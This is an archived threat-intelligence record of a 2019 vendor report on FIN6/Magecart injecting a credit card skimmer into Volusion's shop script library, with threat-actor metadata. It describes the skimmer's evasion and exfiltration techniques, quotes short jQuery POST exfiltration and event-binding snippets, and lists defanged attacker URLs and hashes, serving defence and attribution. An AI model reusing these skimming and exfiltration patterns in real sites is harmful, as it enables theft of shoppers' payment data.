{ "id": "4b82c4a5-3d50-4c5e-b26f-6fc86d845c7c", "created_at": "2026-04-06T00:08:47.928001Z", "updated_at": "2026-04-10T03:37:26.294279Z", "deleted_at": null, "sha1_hash": "f2f120a0bd41748b0d69d8616fdd2a7713d1510e", "title": "Magecart Card Skimmers Injected Into Online Shops", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 83879, "plain_text": "Magecart Card Skimmers Injected Into Online Shops\r\nBy By: Joseph C Chen Oct 10, 2019 Read time: 6 min (1565 words)\r\nPublished: 2019-10-10 · Archived: 2026-04-05 18:28:34 UTC\r\nUpdated on October 14, 2019 at 2:50 AM PST to add a statement from Volusion.\r\nWe discovered that the online credit card skimming attack known as Magecartopen on a new tab or E-Skimmingopen on a\r\nnew tab was actively operating on 3,126 online shops. Our data shows that the attack started on September 7, 2019. All of\r\nthe impacted online shops are hosted on the cloud platform of the e-commerce service provider “Volusion,” one of the top e-commerce platformsopen on a new tab in the market. This is actually the third time we have identified a card skimmer\r\ninjected into the cloud platform of an e-commerce provider. Two other businesses were already victimized this year: a\r\ncampusopen on a new tab e-commerce platform and a hotelopen on a new tab e-commerce platform. These targets are\r\nobviously appealing to cybercriminals since they are connected to multiple — in this most recent case, thousands of —\r\nonline shops.\r\nWe found malicious code injected into a JavaScript library provided by Volusion to their client shops. The injected code\r\nloaded another JavaScript stored on a Google Storageopen on a new tab service. The loaded script is almost a direct copy of\r\na normal JavaScript library but has a credit card skimmer carefully integrated. When customers submit their payment\r\ninformation, the skimmer will copy and send the personal information and credit card details to an exfiltration server\r\nbelonging to the attackers.\r\nOur team contacted Google and they have removed the file. The attack is currently offline. As of publication, Volusion has\r\nacknowledgedopen on a new tab and fixed the issueopen on a new tab.\r\nintel\r\nFigure 1. Online credit card skimming attack chain\r\nintel\r\nFigure 2. Country distribution of online shop users who accessed the card skimmer (based on data from the Trend Micro™\r\nSmart Protection Network™ infrastructure)\r\nDuring our investigation, we found that the attackers seemed more experienced and thoughtful than many other skimmer\r\ngroups. They did not simply add their malicious code at the top or end of a script; instead, they carefully integrated the code\r\ninto the original script to be part of the execution flow of the program. The code was also written as simply as possible,\r\nmaking it difficult to be identified in a big library. Furthermore, they registered the domain of their exfiltration server in a\r\nsimilar style to a legitimate Volusion domain.\r\nConsidering the modus operandi, we believe the attackers are from Magecart Group 6, which has also been identifiedopen\r\non a new tab as the notorious threat actor FIN6open on a new tab. We found similarities in the code used in this attack and\r\nthe code used in FIN6’s previous attacks on British Airwaysopen on a new tab and Neweggopen on a new tab.\r\nAnalysis of the code injection\r\nThe attackers injected their code into a library provided on Volusion’s e-commerce platform for their client shops. The\r\nscript, described by the comments on the library, includes the necessary code for the pop-out feature of the shop’s navigation\r\nmenu. It was also used on the shop checkout page. The script is located at:\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/\r\nPage 1 of 5\n\nhxxps://[online shop domain]/a/j/vnav.js\r\nThe attackers didn’t just inject their code inside the library. They also integrated their code into the original function of\r\njQueryUIopen on a new tab code to be executed with the original execution flow. They created a new object\r\n“e.widget.unbridge” right before the original object “e.widget.bridge” and the malicious code is inside the new object. It’s\r\nworth noting that the attackers even wrote their malicious code in a similar coding style to make it look more like a part of\r\nthe original source code.\r\nThe injected object will create a new script element to load another remote script stored on Google Storage.\r\nintel\r\nFigure 3. Malicious script injected into Volusion’s JavaScript library\r\nintel\r\nFigure 4. Comparison of the original Volusion script (left) and the script with injection (right); the injected malicious code is\r\nhighlighted\r\nAnalysis of the credit card skimmer\r\nThe loaded remote script is on Google Storage: \r\nhxxps[:]//storage[.]googleapis[.]com/volusionapi/resources.js\r\nMuch of the code inside the script is from the library “js-cookieopen on a new tab” version 2.2.1. However, the attackers\r\nmodified it and integrated a credit card skimmer into the original script. The skimmer binds at the events “mousedown”open\r\non a new tab and “touchstart”open on a new tab of the payment submit button.\r\nThis means that when victims click (from desktop) or touch (from mobile devices) the submit button, the events will be\r\ntriggered and the skimmer will be executed.\r\nintel\r\nFigure 5. Comparison of the JavaScript library injected with the skimmer (left) and the original “js-cookie” library (right)\r\nThe skimmer copies the information on the entire payment form: the victim’s name, address, phone number, email address,\r\nand credit card details (the number, cardholder name, expiration month, expiration year, and CVV number).\r\nOnce the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it\r\nperforms a character permutation on the encoded string to make sure it can’t be directly decoded with Base64 decoding.\r\nThe data will then be stored in sessionStorageopen on a new tab with the key “__utmz_opt_in_out”. The next time the\r\nskimmer is loaded (usually on the page after the payment), it will detect if there is data inside sessionStorage and it will use\r\nHTTP POST to send the stolen payment information to a remote server at “hxxps[:]//volusion-cdn[.]com/analytics/beacon”\r\nfor exfiltration.\r\nintel\r\nFigure 6. Main script of the credit card skimmer\r\nNote that the attackers used the domain “volusion-cdn[.]com” for their exfiltration server, a similar name to Volusion’s\r\nlegitimate server. A possible reason why the attackers stored the skimmer on Google Storage is because Volusion is also\r\nrunning its serviceopen on a new tab on the Google Cloud Platform.\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/\r\nPage 2 of 5\n\nEvidence of Magecart or FIN6\r\nAs previously mentioned, based on the modus operandi, we believe the attackers are from Magecart Group 6, also known as\r\nthe threat actor FIN6. Here are the connections we considered:\r\nGroup 6 is known to only target top-tier victims, investing in scams where they can receive a big payoff from one\r\nattack. This single hack of Volusion allows them to receive credit card data from 3,126 online shops.\r\nFrom the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to\r\nregister the domains of the exfiltration server to be similar to the victims’ domains. In this case, the domain of the\r\nexfiltration server is “volusion-cdn[.]com” — very similar to the valid domain “cdn3[.]volusion[.]com” from\r\nVolusion. In addition, the exfiltration domains used during the British Airways, Newegg, and Volusion attacks are all\r\nregistered through Namecheapopen on a new tab.\r\nWe found that the skimmer is an improved version of the previous skimmer used in the attacks on British Airways\r\nand Newegg. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the\r\njQuery.ajax function to POST data to a remote server. Although the older skimmer is much simpler compared to the\r\ncurrent one, it didn’t encode the stolen data or store the data in sessionStorage before the exfiltration.\r\nTarget Script of data exfiltration request\r\nBritish\r\nAirways\r\njQuery.ajax({type:\"POST\",async:0,url:”[exfiltration url]”,data:t,dataType:\"application/json})\r\nNewegg jQuery.ajax({type:\"POST\",async:true,url:”[exfiltration url]”,data:pdati,dataType:\"application/json})\r\nVolusion\r\n$.ajax({type: 'POST',url: '[exfiltration url]',dataType: 'application/x-www-form-urlencoded',data:\r\nd,complete: function() { window.sessionStorage.removeItem('__utmz_opt_in_out'); }})\r\nIt’s also interesting to see that the skimmer in this attack binds to event “mousedown” and event “touchstart” of the payment\r\nsubmit button. The previous Group 6 skimmer binds to event “mouseup” and event “touchend”.\r\nThese events are different, but they are the pairs of each other that trigger the skimmer at almost the same time. It seems that\r\nthey want to trigger the skimmer at the same moment, but the current version binds on two opposite events of the pairs to\r\navoid detection from heuristic rules.\r\nTarget Script of event binding\r\nBritish Airways .bind(\"mouseup touchend\", function(a) {…})\r\nNewegg .bind(\"mouseup touchend\", function(e) {…})\r\nVolusion .bind('mousedown touchstart', z)\r\nIt seems that Magecart is continuing to change and experiment with new attack methods, refining its skimmer to evade\r\ndetection. Sophisticated groups such as these will always try to find new ways to stay undetected in their victims’ systems.\r\nTo defend against this type of threat, website owners should regularly check and strengthen their securityopen on a new tab\r\nwith patches and server segregation. Site owners should also employ robust authentication mechanisms, especially for those\r\nthat store and manage sensitive dataopen on a new tab. IT and security teams should restrict or disable outdated components\r\nand habitually monitor websites and applications for any indicators of suspicious activity that could lead to data exfiltration,\r\nexecution of unknown scripts, or unauthorized access and modification.\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/\r\nPage 3 of 5\n\nThe following Trend Micro solutions, powered by XGen™ securityopen on a new tab, protect users and businesses by\r\nblocking the scripts and preventing access to the malicious domains:\r\nTrend Micro Securityproducts\r\nSmart Protection Suitesopen on a new tab and Worry-Free™ Business Securityopen on a new tab\r\nTrend Micro Network Defenseopen on a new tab\r\nHybrid Cloud Securityopen on a new tab\r\nResearcher Marcel Afrahim also published a Medium post on this case.\r\nIndicators of Compromise\r\nIndicator Attribution Detection name\r\nvolusion-cdn[.]com\r\nFIN6\r\nexfiltration\r\nserver\r\ndomain\r\n \r\nhttps[:]//volusion-cdn[.]com/analytics/beacon\r\nFIN6\r\nexfiltration\r\nserver URL\r\n \r\nhttps[:]//storage[.]googleapis[.]com/volusionapi/resources.js\r\nFIN6 credit\r\ncard\r\nskimmer\r\nURL\r\n \r\n2348433df49e73217969a45726c53441f092c4a6fce57d1d58a6cf79d3976058\r\nFIN6 credit\r\ncard\r\nskimmer\r\nhash\r\nTrojanSpy.JS.MAGECART.C\r\ncee25c699a14a04c6e1b6e6fcd5ce7d4414c9f324b62509a7af14ae5bf749af8\r\nFIN6 credit\r\ncard\r\nskimmer\r\nhash\r\nTrojanSpy.JS.MAGECART.D\r\nd03f18a71ce059a79840a38aad4944426f0524bbd68a7a8fb7003c82996e6533\r\n \r\nFIN6 credit\r\ncard\r\nskimmer\r\nhash\r\nTrojanSpy.JS.MAGECART.D\r\nA Volusion spokesperson has added the following statement:\r\n\"Volusion was alerted of a data security incident and can confirm that it was resolved within a few hours of notification. We\r\nare coordinating with authorities on this matter, and continue to enhance our systems that detect and prevent unauthorized\r\naccess to user accounts.\r\nA limited portion of customer information was compromised from a subset of our merchants. This included credit card\r\ninformation, but not other associated personally identifying details. We are not aware of any fraudulent activity connected to\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/\r\nPage 4 of 5\n\nthis matter.\r\nVolusion has taken action to help secure accounts, and we are continuing to monitor this matter in order to assure the\r\nsecurity of our merchants.\"\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-i\r\nnto-thousands-of-online-shops/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/" ], "report_names": [ "fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops" ], "threat_actors": [ { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed", "created_at": "2023-01-06T13:46:38.814104Z", "updated_at": "2026-04-10T02:00:03.110104Z", "deleted_at": null, "main_name": "MageCart", "aliases": [], "source_name": "MISPGALAXY:MageCart", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4", "created_at": "2023-01-06T13:46:38.269054Z", "updated_at": "2026-04-10T02:00:02.90356Z", "deleted_at": null, "main_name": "APT3", "aliases": [ "GOTHIC PANDA", "TG-0110", "Buckeye", "Group 6", "Boyusec", "BORON", "BRONZE MAYFAIR", "Red Sylvan", "Brocade Typhoon" ], "source_name": "MISPGALAXY:APT3", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "06f622cb-3a78-49cf-9a4c-a6007a69325f", "created_at": "2022-10-25T16:07:23.315239Z", "updated_at": "2026-04-10T02:00:04.537826Z", "deleted_at": null, "main_name": "APT 3", "aliases": [ "APT 3", "Boron", "Brocade Typhoon", "Bronze Mayfair", "Buckeye", "G0022", "Gothic Panda", "Group 6", "Operation Clandestine Fox", "Operation Clandestine Fox, Part Deux", "Operation Clandestine Wolf", "Operation Double Tap", "Red Sylvan", "TG-0110", "UPS Team" ], "source_name": "ETDA:APT 3", "tools": [ "APT3 Keylogger", "Agent.dhwf", "BKDR_HUPIGON", "Backdoor.APT.CookieCutter", "Badey", "Bemstour", "CookieCutter", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EXL", "EternalBlue", "HTran", "HUC Packet Transmit Tool", "Hupigon", "Hupigon RAT", "Kaba", "Korplug", "LaZagne", "MFC Huner", "OSInfo", "Pirpi", "PlugX", "RedDelta", "RemoteCMD", "SHOTPUT", "Sogu", "TIGERPLUG", "TTCalc", "TVT", "Thoper", "Xamtrav", "remotecmd", "shareip", "w32times" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434127, "ts_updated_at": 1775792246, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f2f120a0bd41748b0d69d8616fdd2a7713d1510e.pdf", "text": "https://archive.orkl.eu/f2f120a0bd41748b0d69d8616fdd2a7713d1510e.txt", "img": "https://archive.orkl.eu/f2f120a0bd41748b0d69d8616fdd2a7713d1510e.jpg" } }